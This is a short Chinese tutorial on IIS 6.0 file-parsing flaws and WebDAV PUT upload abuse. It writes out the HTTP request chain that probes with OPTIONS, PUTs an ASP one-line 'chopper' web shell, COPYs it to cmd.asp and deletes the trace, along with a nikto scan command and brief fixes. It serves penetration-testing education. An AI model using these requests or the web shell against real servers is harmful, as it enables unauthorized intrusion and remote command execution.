中间件解析漏洞-IIS6.0
IIS6.0解析漏洞介绍
(1) 当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将会被IIS当做asp解析。<%=NOW()%>
(2) 当文件.asp;1.jpg IIS6.0同样会将文件作为asp文件解析。
微软目前也没有推出补丁,不认为这是一个漏洞。
IIS6.0 PUT上传原理
WebDAV 基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。
1、探测是否存在IIS PUT漏洞。
OPTIONS / HTTP1.1
Host: www.xxx.com
2、上传txt文本文件
PUT /a.txt HTTP1.1
Host: www.xxx.com
Content-Length:30
<%eval request(“chopper”)%>
3、通过Move或Copy重命名
COPY /a.txt HTTP1.1
Host: www.xxx.com
Destination:
http://www.xxx.com/cmd.asp
4、删除
DELETE /a.txt HTTP1.1
Host: www.xxx.com
IIS6.0 PUT上传探测
利用nikto探测
nikto -h IP地址
IIS6.0 PUT上传利用
此时就可以利用Burpsuite进行IIS PUT漏洞利用。先用OPTIONS探测、PUT、MOVE、DELETE
IIS6.0解析文件类型
IIS6.0默认的可执行文件除了asp还有下面的三种:
/test.asa
/test.cer
/test.cdx
IIS文件解析漏洞修复方案
1、目前尚无微软官方的补丁,可以通过自己编写正则,阻止上传xx.asp;.jpg类型的文件名。
2、做好权限设置,限制用户创建文件夹。